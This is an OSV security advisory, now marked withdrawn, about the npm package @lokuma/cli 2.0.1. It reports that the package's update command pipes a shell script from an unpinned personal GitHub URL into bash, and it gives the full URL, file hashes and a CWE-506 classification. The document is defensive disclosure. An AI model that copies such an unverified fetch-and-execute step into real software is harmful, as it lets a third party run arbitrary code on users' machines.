MAL-2026-4405

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@lokuma/cli/MAL-2026-4405.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-4405

Withdrawn

2026-05-26T21:41:23Z

Published

2026-05-21T13:49:03Z

Modified

2026-05-27T00:31:59.585094543Z

Summary

Malicious code in @lokuma/cli (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (c1ea692229343873d930161e52d11be25bab87d4a00e942ceb18c1751f0f7586)

The update subcommand of this CLI executes curl -fsSL <url> | bash where the URL is https://raw.githubusercontent.com/Mumu090909/lokuma-da-v2-trial/main/installer/install-v2-trial.sh — a mutable main branch on a personal GitHub account (Mumu090909) that does not match the package's declared publisher (scope @lokuma, author hello@lokuma.ai, repo github.com/lokuma-web/lokuma-cli, homepage lokuma.ai). The fetch has no commit pin, no hash, and no signature check. README instructs users to run lokuma update, so any user following the documented upgrade path will execute whatever shell script Mumu090909 chooses to host at that path on any future date. Whoever controls that personal repository can run arbitrary commands as the invoking user on every machine that runs the update command. The publisher mismatch (a personal account fronting an installer for a scoped vendor package) and the README/homepage TLD inconsistency (lokuma.ai vs lokuma.io) further weaken any benign reading.

Database specific

{
    "malicious-packages-origins": [
        {
            "sha256": "c1ea692229343873d930161e52d11be25bab87d4a00e942ceb18c1751f0f7586",
            "source": "amazon-inspector",
            "modified_time": "2026-05-21T13:49:03Z",
            "versions": [
                "2.0.1"
            ],
            "id": "IN-MAL-2026-003839",
            "import_time": "2026-05-26T05:51:25.285902813Z"
        }
    ]
}

References

https://www.npmjs.com/package/@lokuma/cli/v/2.0.1

Credits

- Amazon Inspector - FINDER
- - actran@amazon.com

Affected packages

npm / @lokuma/cli

Package

Name: @lokuma/cli; View open source insights on deps.dev
Purl: pkg:npm/%40lokuma%2Fcli

Affected ranges

Affected versions

2.*

2.0.1

Database specific

source

"https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@lokuma/cli/MAL-2026-4405.json"

indicators

{
    "package_integrity": [
        {
            "filename": "cli-2.0.1.tgz",
            "hashes": {
                "sha1": "aaafad3c43c0f75cc6c75dbbddc0849a2edb5749",
                "sha512_sri": "sha512-CBhxTVv/xcg+NZlu8Q124mgLbKWtld+Ppie2CQUFXFPH5uRlDvt/BUAsJI4k+q9Eiy+PpCYHMgmo3dTJMRw4dQ=="
            }
        }
    ],
    "evidence_files": [
        {
            "path": "dist/index.js",
            "tlsh": "d592c606cdfa123502e3109d980b553b6669a5333368e964fbac43683fcd764c9a77bc",
            "sha256": "045e0030bd562ce8dcd01ac306e457ca003335fd082e956b1abf5d0667cde8ae"
        },
        {
            "path": "package.json",
            "tlsh": "0321cc35ca308d5306c806a4687a078796aa88534f78fc0873d2831c8f8e32f01fc27e",
            "sha256": "142d6da1ee61f741b3d9309e5a5bb735adfbd1e17b5bb63b1c7fef524902708a"
        }
    ]
}

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]